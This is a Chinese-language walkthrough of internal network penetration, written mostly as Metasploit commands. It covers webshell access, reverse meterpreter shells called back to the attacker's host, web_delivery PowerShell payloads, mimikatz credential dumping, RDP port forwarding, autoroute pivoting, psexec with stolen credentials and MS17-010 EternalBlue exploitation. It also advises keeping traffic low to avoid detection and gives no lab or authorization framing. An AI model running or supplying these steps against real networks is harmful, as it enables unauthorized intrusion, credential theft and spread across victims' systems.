内网渗透实战思路详解

1. 初始访问

1.1 获取初始Shell

• 通过后台弱口令登录
• 利用上传漏洞上传Webshell
• 使用冰蝎(Behinder)连接获取Webshell

1.2 验证网络连通性

ping 8.8.8.8  # 检查是否与外网互通

2. 建立持久会话

2.1 直接反弹Shell尝试

使用Metasploit的exploit/multi/handler模块：

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost [你的IP]
set lport 5665
run

2.2 使用Web Delivery方法

当直接反弹失败时，利用web_delivery模块：

use exploit/multi/script/web_delivery
set target 2
set payload windows/x64/meterpreter/reverse_https
set lhost [你的IP]
set lport 4332
set srvport 8080
run

执行生成的PowerShell命令获取Session

3. 权限维持

3.1 进程迁移

• 使用ps查看进程列表
• 选择稳定系统进程迁移(如spoolsv.exe)

migrate [进程ID]
getpid  # 验证当前进程ID

4. 内网信息收集

4.1 网络信息收集

ifconfig/ipconfig  # 查看IP信息
arp -a  # 查看ARP缓存
netstat -ano  # 查看开放端口和连接

4.2 凭证获取

尝试获取明文密码：

load mimikatz
wdigest  # 尝试获取明文凭证

4.3 RDP访问

发现3389端口开放时：

portfwd add -l 6666 -p 3389 -r 127.0.0.1  # 端口转发

使用获取的凭证尝试RDP登录

4.4 发现新网段

检查VNC相关文件可能发现新网段信息

5. 横向移动

5.1 路由设置

run autoroute -s 192.168.10.0/24
run autoroute -s 172.16.0.0/24
bg  # 退回控制台

5.2 SMB服务扫描

use auxiliary/scanner/smb/smb_version
set rhosts 192.168.10.0/24
set threads 10
run

5.3 尝试Psexec横向

use auxiliary/scanner/smb/psexec_loggedin_users
set rhosts 192.168.10.0/24
set smbuser [用户名]
set smbpass [密码]
set threads 5
run

5.4 MS17-010漏洞利用

扫描漏洞主机

use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.10.0/24
set thread 20
run

执行命令

use auxiliary/admin/smb/ms17_010_command
set rhost 192.168.10.18
set command whoami
run

获取Session

对于非2003系统：

use exploit/windows/smb/ms17_010_eternalblue
# 或
use exploit/windows/smb/ms17_010_psexec

6. 持续渗透

• 在新获取的主机上重复信息收集步骤
• 发现新网段后添加路由
• 使用相同方法继续横向移动

注意事项

1. 2003系统建议使用ms17_010_command模块
2. 横向移动时注意流量大小，避免被发现
3. 优先选择系统进程进行迁移
4. 多种方法尝试获取凭证(Wdigest、Cobalt Strike等)
5. 注意敏感信息处理，避免泄露

通过以上步骤，可以系统性地进行内网渗透，从初始访问到横向移动，逐步扩大在内网中的控制范围。